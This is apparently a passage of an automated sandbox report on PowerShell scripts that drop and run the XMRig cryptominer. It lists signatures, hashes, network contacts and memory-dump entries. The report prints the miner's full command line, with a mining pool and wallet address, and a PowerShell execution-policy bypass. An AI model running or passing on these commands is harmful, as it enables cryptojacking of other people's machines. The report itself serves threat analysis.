memory/1028-65-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-66-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-67-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-68-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-69-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-70-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-71-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-72-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-73-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-74-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-75-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-76-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-77-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-78-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-79-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-80-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-81-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-82-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-83-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-84-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-85-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-86-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-87-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-88-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-89-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-90-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-91-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-92-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-93-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-94-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-95-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-96-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-97-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-98-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-99-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-100-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-101-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-102-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-103-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-104-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-105-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-106-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-107-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-108-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-109-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-110-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-111-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-112-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-113-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-114-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-115-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-116-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

memory/1028-117-0x00007FF67A280000-0x00007FF67AEB3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:54

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp

Files

memory/2496-0-0x00007FFBFE6C3000-0x00007FFBFE6C5000-memory.dmp

memory/2496-1-0x0000026276760000-0x0000026276782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysg55qtr.5tg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2496-11-0x00007FFBFE6C0000-0x00007FFBFF181000-memory.dmp

memory/2496-12-0x00007FFBFE6C0000-0x00007FFBFF181000-memory.dmp

memory/2496-14-0x00007FFBFE6C0000-0x00007FFBFF181000-memory.dmp

memory/2496-16-0x0000026276A30000-0x0000026276A3A000-memory.dmp

memory/2496-15-0x0000026276A50000-0x0000026276A62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1432-47-0x00000212DB760000-0x00000212DB780000-memory.dmp

memory/1432-48-0x000002136DD20000-0x000002136DD40000-memory.dmp

memory/1432-49-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-53-0x000002136E390000-0x000002136E3B0000-memory.dmp

memory/1432-50-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-52-0x000002136E370000-0x000002136E390000-memory.dmp

memory/2496-51-0x00007FFBFE6C3000-0x00007FFBFE6C5000-memory.dmp

memory/2496-54-0x00007FFBFE6C0000-0x00007FFBFF181000-memory.dmp

memory/1432-55-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/2496-56-0x00007FFBFE6C0000-0x00007FFBFF181000-memory.dmp

memory/1432-57-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-58-0x000002136E370000-0x000002136E390000-memory.dmp

memory/1432-59-0x000002136E390000-0x000002136E3B0000-memory.dmp

memory/1432-60-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-61-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-62-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-63-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-64-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-65-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-66-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-67-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-68-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-69-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-70-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-71-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-72-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-73-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-74-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-75-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-76-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-77-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-78-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-79-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-80-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-81-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-82-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-83-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-84-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-85-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-86-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-87-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-88-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-89-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-90-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-91-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-92-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-93-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-94-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-95-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-96-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-97-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-98-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-99-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-100-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-101-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-102-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-103-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-104-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-105-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-106-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-107-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-108-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-109-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-110-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-111-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-112-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-113-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-114-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-115-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-116-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-117-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

memory/1432-118-0x00007FF63A7B0000-0x00007FF63B3E3000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:59

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp

Files

memory/1804-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onkzk40j.pl3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1804-6-0x000001F722C20000-0x000001F722C42000-memory.dmp

memory/1804-11-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1804-12-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1804-14-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/1804-15-0x000001F722FB0000-0x000001F722FC2000-memory.dmp

memory/1804-16-0x000001F722FA0000-0x000001F722FAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2416-47-0x0000028896620000-0x0000028896640000-memory.dmp

memory/2416-48-0x0000028898020000-0x0000028898040000-memory.dmp

memory/2416-49-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-53-0x0000028898060000-0x0000028898080000-memory.dmp

memory/2416-52-0x0000028898040000-0x0000028898060000-memory.dmp

memory/1804-51-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/2416-50-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/1804-54-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/2416-55-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-56-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-57-0x0000028898040000-0x0000028898060000-memory.dmp

memory/2416-58-0x0000028898060000-0x0000028898080000-memory.dmp

memory/2416-59-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-60-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-61-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-62-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-63-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-64-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-65-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-66-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-67-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-68-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-69-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-70-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-71-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-72-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-73-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-74-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-75-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-76-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-77-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-78-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-79-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-80-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-81-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-82-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-83-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-84-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-85-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-86-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-87-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-88-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-89-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-90-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-91-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-92-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-93-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-94-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-95-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-96-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-97-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-98-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-99-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-100-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-101-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-102-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-103-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-104-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-105-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-106-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-107-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-108-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-109-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-110-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-111-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-112-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-113-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-114-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-115-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-116-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

memory/2416-117-0x00007FF712BE0000-0x00007FF713813000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:06

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
